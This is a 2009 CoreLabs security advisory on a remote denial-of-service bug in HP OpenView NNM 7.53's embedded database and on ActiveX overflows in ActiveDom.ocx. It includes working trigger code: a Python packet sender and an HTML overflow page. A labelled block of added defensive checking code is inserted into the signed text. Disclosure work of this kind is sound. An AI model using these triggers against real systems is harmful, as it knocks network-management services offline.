-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

        Core Security Technologies - CoreLabs Advisory
             http://www.coresecurity.com/corelabs/

      HP Openview NNM 7.53 Invalid DB Error Code vulnerability


1. *Advisory Information*

Title: HP Openview NNM 7.53 Invalid DB Error Code vulnerability
Advisory Id: CORE-2009-0814
Advisory URL: http://www.coresecurity.com/content/openview_nnm_internaldb_dos
Date published: 2009-11-17
Date of last update: 2009-11-17
Vendors contacted: HP
Release mode: Coordinated release


2. *Vulnerability Information*

Class: External Initialization of Trusted Variables [CWE-454]
Impact: Denial of Service
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: N/A
CVE Name: CVE-2009-3840


3. *Vulnerability Description*

HP Openview Network Node Manager is one of the most widely deployed network
monitoring and management platforms in use in enterprise organizations today.
The platform includes many server- and client-side core components with a long
list of previously disclosed security bugs. In this case, a remotely
exploitable vulnerability was found in the database server core component used
by NNM. Exploitation of the bug does not require authentication and leads to a
remotely triggered denial of service of the internal database service.


4. *Vulnerable packages*

   . HP Openview NNM 7.53

Other versions may be vulnerable but were not tested. Refer to the vendor's
security bulletin for a full list.


5. *Non-vulnerable packages*

Refer to the vendor's security bulletin.


6. *Vendor Information, Solutions and Workarounds*

The vendor issued security bulletin HPSBMA02477 SSRT090177 to address the
problem and provide fixes. It is available at
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01926980

The database service of HP Openview Network Node Manager is remotely accessible
on port 2690/tcp. Restricting or blocking access to that port will prevent
exploitation but may prevent normal operation of Openview NNM.


7. *Credits*

This vulnerability was discovered and researched by Damian Frizza from Core
Security Technologies.


8. *Technical Description / Proof of Concept Code*

8.1. *HP Openview NNM 7.53 Embedded DB Remote Denial Of Service*

HP Openview Network Node Manager includes an embedded database engine service
that is enabled by default and accepts remote connections on port 2690/tcp. The
service is implemented by 'ovdbrun.exe', which is started automatically at
boot.

For certain transactions, upon receiving a packet from the network, the service
attempts to determine and display an error string based on an error code number
specified in the packet. By sending a specifically crafted packet with an
invalid error code number it is possible to remotely trigger an exception that
forces abnormal termination of the service. It is unlikely that the bug could
be exploited for anything other than a remote denial of service.

The following code excerpt explains the problem:

/-----
005FED51   MOVZX EDX,BYTE PTR SS:[ESP+2]        #FCFF
005FED56   MOVSX ECX,WORD PTR SS:[ESP+3]
005FED5B   CMP ECX,-1
005FED5E   MOVSX EAX,WORD PTR SS:[ESP+5]        #FCFF
005FED63   MOV DWORD PTR DS:[ESI+10],EDX
005FED66   MOV EDX,DWORD PTR SS:[ESP+7]
005FED6A   MOV DWORD PTR DS:[ESI+14],ECX
005FED6D   MOV DWORD PTR DS:[ESI+18],EAX
005FED70   MOV DWORD PTR DS:[ESI+C],EDX
005FED73   JGE SHORT ovdbrun.005FED7E
005FED75   CMP EAX,-1
005FED78   JGE SHORT ovdbrun.005FED7E
005FED7A   CMP ECX,EAX
005FED7C   JE SHORT ovdbrun.005FED83
005FED7E   MOV EAX,1
005FED83   ADD ESP,0C
005FED86   RETN
-----/

The code above checks for an error condition based on the value of an Error
Code field in the inbound network packet. An error condition is explicitly
handled if the Error Code value is less than or equal to -1, in which case a
MessageBox with a corresponding descriptive error string is presented to the
user.
However, by crafting a packet with any negative value in the Error Code field
other than -1, the lookup for the corresponding error string fails, triggering
a non-recoverable error and thus terminating the server process.

The following python code can be used to reproduce the bug:

/-----
#!python
# Python 2: str and the packed bytes concatenate directly.
import socket
import struct

a = struct.pack('<b', 2)          # packet type
a += struct.pack('<H', 0)
a += struct.pack('<H', 0xFEFF)    # Error Code field: 0xFEFF is -257 as a signed 16-bit value
a += struct.pack('<H', 0xFEFF)
a += "1234"

target_ip = 'X.X.X.X'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, 2690))
s.send(a)
s.close()
-----/

8.2. *Additional information: Low severity bugs in ActiveDom.ocx ActiveX*

The ActiveX control 'ActiveDom.ocx' is shipped with HP Openview NNM 7.53 and
installed by default. The control is prone to multiple memory corruption bugs
due to erroneous handling of overly long strings passed to multiple methods.
These bugs are considered of low severity because the control is not
configured as Safe for Scripting or Safe for Initialization [1] and therefore
cannot be exploited without explicit user consent. Since the vendor reported
the control as neither used nor required by any component of OpenView NNM,
finding deployed systems whose security configuration has been changed to
allow exploitation of these bugs is very unlikely. Nonetheless, information
about them is included below for completeness.
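Two checks a defender would want from section 8, written here as an added example; this is not Core Security's or HP's code. The first parses the 11-byte request layout that the proof of concept in 8.1 sends (type byte, 16-bit word, two signed 16-bit words, 4-byte trailer), mirrors the comparison sequence from the ovdbrun.exe listing, and places beside it the bounds check the advisory describes as missing, so a captured request can be classified before it reaches a string-table lookup. The second evaluates the configuration the advisory asks users to verify for 'ActiveDom.ocx': whether the control is registered as Safe for Scripting or Safe for Initialization [1] and whether its kill bit is set [2], which is the workaround HP chose. The field names, the accepted-value policy and the sample packets are our assumptions; the category GUIDs and registry paths are the standard Windows ones and do not come from this advisory.

```python
# Added example, not Core Security's or HP's code: defender-side checks for the two
# issues in section 8. The 2690/tcp field layout is taken from the proof-of-concept
# (type byte, 16-bit word, two signed 16-bit words, 4-byte trailer); the field
# names, the accepted-value policy and the sample packets are our assumptions.
import struct

DB_PORT = 2690
PKT = struct.Struct('<BHhh4s')   # offsets 0, 1, 3, 5 and 7; 11 bytes in total

# --- 8.1: the embedded database request -------------------------------------

def parse_db_packet(data):
    """Split a request into its header fields; raise ValueError if it is too short."""
    if len(data) < PKT.size:
        raise ValueError('packet shorter than %d bytes' % PKT.size)
    kind, word1, code_a, code_b, trailer = PKT.unpack_from(data)
    return {'type': kind, 'word1': word1, 'code_a': code_a,
            'code_b': code_b, 'trailer': trailer}

def original_check(code_a, code_b):
    """Mirror of the listing at 005FED5B-005FED86: the result is 1 unless both
    signed words are below -1 and equal, in which case the raw word itself is
    returned and later used to look up an error string. No bounds check."""
    if code_a >= -1 or code_b >= -1:
        return 1
    return code_b if code_a == code_b else 1

def hardened_check(code_a, code_b):
    """The check the advisory text implies is missing: -1 is the only negative
    error code the service knows how to describe, so anything below -1 is
    refused before a lookup can happen (assumed policy)."""
    for code in (code_a, code_b):
        if code < -1:
            raise ValueError('error code %d has no string-table entry' % code)
    return original_check(code_a, code_b)

def classify_packet(data):
    """'malformed' if the packet would reach the failing lookup, otherwise 'ok'."""
    try:
        fields = parse_db_packet(data)
        hardened_check(fields['code_a'], fields['code_b'])
    except ValueError:
        return 'malformed'
    return 'ok'

# Constructed samples: the PoC bytes from 8.1 (0xFEFF is -257 signed) and a benign request.
POC_PACKET = PKT.pack(2, 0, -257, -257, b'1234')
BENIGN_PACKET = PKT.pack(2, 0, 0, 0, b'1234')

# --- 8.2: is ActiveDom.ocx marked safe, and is its kill bit set? -------------

ACTIVEDOM_CLSID = '{A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE}'
CATID_SAFE_FOR_SCRIPTING = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
CATID_SAFE_FOR_INITIALIZING = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
KILL_BIT = 0x400   # 'Compatibility Flags' bit described in reference [2]

def assess_control(categories, compat_flags):
    """categories: subkey names under HKCR\\CLSID\\<clsid>\\Implemented Categories;
    compat_flags: the 'Compatibility Flags' DWORD under HKLM\\SOFTWARE\\Microsoft\\
    Internet Explorer\\ActiveX Compatibility\\<clsid>, or None when absent.
    Only registry markings are inspected; a control can also claim safety at run
    time through IObjectSafety, which this function cannot see."""
    cats = {c.upper() for c in categories}
    flags = compat_flags or 0
    return {'safe_for_scripting': CATID_SAFE_FOR_SCRIPTING in cats,
            'safe_for_initializing': CATID_SAFE_FOR_INITIALIZING in cats,
            'kill_bit_set': bool(flags & KILL_BIT)}

def read_control_registration(clsid):
    """Windows only: fetch the two registry items assess_control() needs."""
    import winreg   # absent on other platforms, so imported here on purpose
    cats, flags = [], None
    try:
        with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT,
                            r'CLSID\%s\Implemented Categories' % clsid) as key:
            cats = [winreg.EnumKey(key, i) for i in range(winreg.QueryInfoKey(key)[0])]
    except OSError:
        pass
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                            r'SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\%s' % clsid) as key:
            flags = winreg.QueryValueEx(key, 'Compatibility Flags')[0]
    except OSError:
        pass
    return cats, flags

if __name__ == '__main__':
    for name, pkt in (('poc', POC_PACKET), ('benign', BENIGN_PACKET)):
        print(name, classify_packet(pkt))
    print(assess_control([], 0x400))   # a control left only with its kill bit set
```

On a Windows host, `assess_control(*read_control_registration(ACTIVEDOM_CLSID))` gives the three answers for the shipped control; a result with `kill_bit_set` false and either safety flag true is the configuration the advisory warns should not be found on deployed systems.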
Some of the ActiveX control's methods with implementation flaws are:

/-----
DisplayName(str)
AddGroup(str)
InstallComponent(str)
Subscribe(str, str, int)
-----/

The following excerpt from method DisplayName() demonstrates the problem:

/-----
2000D408   MOV DWORD PTR SS:[EBP-4],-1
2000D40F   JMP SHORT ACTIVE~1.2000D3D6
2000D411   MOV EAX,ACTIVE~1.200361A0
2000D416   JMP <JMP.&MSVCRT.__CxxFrameHandler>
2000D41B   MOV EAX,ACTIVE~1.2000D4A8
2000D420   CALL <JMP.&MSVCRT._EH_prolog>
2000D425   SUB ESP,10
2000D428   PUSH EBX
2000D429   PUSH ESI
2000D42A   PUSH EDI
2000D42B   MOV DWORD PTR SS:[EBP-10],ESP
2000D42E   MOV DWORD PTR SS:[EBP-14],ECX
2000D431   XOR EBX,EBX
2000D433   MOV DWORD PTR SS:[EBP-4],EBX
2000D436   LEA ESI,DWORD PTR DS:[ECX+28]
2000D439   MOV ECX,DWORD PTR DS:[ESI]          ; ESI = 00038178
2000D43B   MOV EAX,DWORD PTR DS:[ECX]          ;
2000D43D   CALL DWORD PTR DS:[EAX+48]          ;
-----/

The following HTML code can be used to trigger the bug:

/-----
<html>
<object classid='clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE' id='target'></object>
<script>
a = ""
for (i = 0; i < 10000; i++)
    a = a + "A"
target.DisplayName(a)
</script>
</html>
-----/


9. *Report Timeline*

   . 2009-08-12: Core Security Technologies notifies the HP Software Security
   Response Team (SSRT) of the vulnerability and of the preliminary schedule to
   publish the corresponding security advisory on September 8th, 2009. Core
   asks for acknowledgement of the email within 2 working days and whether HP
   SSRT prefers to receive the technical description of the bug encrypted or in
   plaintext.

   . 2009-08-12: HP SSRT asks Core to send the technical description of the
   vulnerability encrypted using the PGP key with id 0x08B83D45.

   . 2009-08-14: Core Security Technologies sends technical details encrypted
   to HP SSRT.

   . 2009-08-18: HP SSRT informs Core that HP engineering has been notified and
   that it will notify Core when it has a schedule estimate. SSRT assigns the
   IDs SSRT090177 and SSRT090178 to the vulnerabilities reported by Core.

   . 2009-08-27: Core requests a status update from HP SSRT.

   . 2009-08-27: HP SSRT informs Core that the vulnerabilities are in
   third-party code and that the third-party vendor has been notified, but that
   there isn't a schedule for fixes yet. HP SSRT indicates that it is sure HP
   will not have a solution ready by September 7th.

   . 2009-08-27: Core informs the HP team that the publication was re-scheduled
   to September 21st and requests an update to continue coordinating the
   release of fixes and publication of the advisory as soon as possible.

   . 2009-08-28: The HP team informs Core that the third party is planning a
   release on October 30th for the first vulnerability. SSRT also notes that
   the ActiveX vulnerabilities are still being investigated.

   . 2009-08-31: Core Security Technologies acknowledges the information sent
   by HP SSRT.

   . 2009-09-01: The HP team communicates that it will inform Core Security
   Technologies when the fix is available.

   . 2009-09-04: Core asks the HP SSRT to map HP's internal IDs to each of the
   reported vulnerabilities.

   . 2009-09-04: The HP SSRT indicates that SSRT090177 corresponds to the
   embedded database vulnerability and SSRT090178 to the ActiveX bugs.

   . 2009-09-10: Core Security Technologies notifies HP SSRT that publication
   of the advisory has been re-scheduled to October 30th, to be able to
   coordinate the release with the issuance of fixes by the third-party vendor,
   and that if the non-third-party vulnerabilities (the ActiveX bugs) could be
   fixed earlier they would be described in a separate advisory.

   . 2009-09-11: HP SSRT says that it will send any new information on the
   ActiveX bugs to Core if it has something to publish before October 30th.

   . 2009-09-21: The HP team informs Core that it is having some problems
   reproducing the reported ActiveX vulnerabilities. The NNM engineers have
   used the provided proof-of-concept exploit but did not see any effect. SSRT
   asks whether an overflow was confirmed, whether process failure was detected
   and whether a debugger or a different procedure was used.

   . 2009-09-21: Core Security Technologies notifies the HP SSRT that the
   proof-of-concept crash can be observed using a classic debugger or a
   just-in-time debugger that is attached only after an abnormal exception is
   detected. Core also sends HP SSRT another proof-of-concept HTML code that
   crashes the ActiveX control and can be observed without the need for a
   debugger.

   . 2009-09-22: The HP team acknowledges the previous email from Core with the
   new PoC to reproduce the crashes without a debugger.

   . 2009-10-06: Core requests a status update from the SSRT, noting that it
   hasn't received any update since September 22nd. The advisory is still
   scheduled for publication on October 30th and Core is waiting for
   confirmation that the ActiveX bugs were reproduced and that the fix for them
   could be published earlier, separately.

   . 2009-10-09: SSRT updates Core, indicating that fixes from the third party
   for SSRT090177 have been received and that HP is currently in the process of
   testing them on all platforms, expecting an update by October 16th. The
   ActiveX bugs have been reproduced and HP has determined that the vulnerable
   control is not necessary for NNM. HP will recommend that customers set the
   kill bit for the control (clsid:A801FD2B-6FA8-11D0-BB85-00AA00A7EAAE) as a
   workaround.

   . 2009-10-19: Core requests a status update and confirmation that HP will be
   ready to release fixes by October 30th. Core asks whether fixes will be
   issued for all vulnerable versions of NNM, and whether the fixes or patches
   will remove the unnecessary ActiveX control or just ask customers to
   implement the workaround. Core requests the complete list of vulnerable
   versions and platforms of NNM and asks whether the patches will include fixes
   for other bugs. Also, Core notes that the vendor of the third-party component
   has been identified and that, since the bug may affect other products, Core
   will start a separate vulnerability report process directly with that
   vendor.

   . 2009-11-02: Email from Core asking for a status update and for an
   acknowledgement of and response to the questions from the previous email.
   Core notes that the previously agreed publication date for the advisory has
   already passed without any update from HP. The publication date has been
   unilaterally moved to Wednesday, November 4th, 2009 and is considered final
   pending a response from HP.

   . 2009-11-03: Response from HP SSRT stating that there is no estimated
   release date for patches for some platforms. With regard to the ActiveX
   bugs, a security bulletin will be published on November 9th recommending
   setting the kill bit.

   . 2009-11-03: Core indicates that, since there isn't an estimated patch
   release date for the missing platforms, the advisory will be published on
   November 9th and will include guidance on how to implement workarounds for
   both problems. Core asks SSRT about the potential impact of blocking or
   restricting access to the vulnerable service as a workaround.

   . 2009-11-05: SSRT suggests that, given that Core's advisory will be
   published earlier than HP's security bulletin, it should have workarounds
   for all platforms and not just for the ones that may not have a patch
   available afterwards. HP is still investigating the impact of blocking or
   restricting access to the vulnerable port. SSRT asks whether Core wants any
   acknowledgement in its security bulletin.

   . 2009-11-05: Core asks what the planned publication date for HP's bulletin
   is and requests that the bulletin credit the discoverer (Damian Frizza).
   Provided that the estimated date for publishing the bulletin is not
   unreasonable, Core would rather schedule the publication of the advisory to
   match HP's.

   . 2009-11-06: SSRT informs Core that its estimate is to have hotfixes
   available internally by November 13th and released along with the
   corresponding security bulletins by November 17th. SSRT asks whether CVE
   numbers should be assigned by HP or provided by Core.

   . 2009-11-06: Core re-schedules publication to November 17th. Core asks
   SSRT to assign the CVE numbers.

   . 2009-11-12: HP SSRT reports that the ActiveX control is not marked as safe
   for scripting or safe for initialization by default and thus the buffer
   overflows in its methods do not seem to be security issues. HP asks whether
   Core still considers them security vulnerabilities.

   . 2009-11-16: HP SSRT provides the CVE id assigned to the denial of service
   bug. HP indicates that the vendor's security bulletin will not suggest any
   workarounds, as the effect of blocking or restricting access to the
   vulnerable service has not been determined.

   . 2009-11-16: Core confirms that the ActiveX control is not marked as safe
   for scripting or initialization, which greatly diminishes the relevance of
   the reported bugs. Nonetheless, the information about the bugs will be
   included in the advisory for completeness and to let users verify, and if
   necessary correct, the control's configuration settings. Core still
   recommends that the vendor remove the unnecessary control from installation
   packages and fix the reported bugs, to avoid the potential introduction of
   flaws if the control comes into use in the future or should an alternative
   exploitation vector be found.

   . 2009-11-17: Publication of HP Security Bulletin SSRT090177.

   . 2009-11-17: Advisory CORE-2009-0814 published.


10. *References*

[1] Safe Initialization and Scripting for ActiveX Controls.
    http://msdn.microsoft.com/en-us/library/aa751977(VS.85).aspx
[2] How to stop an ActiveX control from running in Internet Explorer.
    http://support.microsoft.com/kb/240797


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged with
anticipating the future needs and requirements for information security
technologies. We conduct our research in several important areas of computer
security including system vulnerabilities, cyber attack planning and
simulation, source code auditing, and cryptography. Our results include
problem formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software tools
for public use at: http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a proactive
process for securing their networks. The company's flagship product, CORE
IMPACT, is the most comprehensive product for performing enterprise security
assurance testing. CORE IMPACT evaluates network, endpoint and end-user
vulnerabilities and identifies what resources are exposed. It enables
organizations to determine if current security investments are detecting and
preventing attacks. Core Security Technologies augments its leading technology
solution with world-class security consulting services, including penetration
testing and software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980 or on the
Web at http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely provided
that no fee is charged for this distribution and proper credit is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of the Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAksDICYACgkQyNibggitWa2//ACdFpN6SK4B59Iza5Nq88oASfat
YhoAn24UcNlJ/lpKv4brl4d6mctKfwMF
=cR49
-----END PGP SIGNATURE-----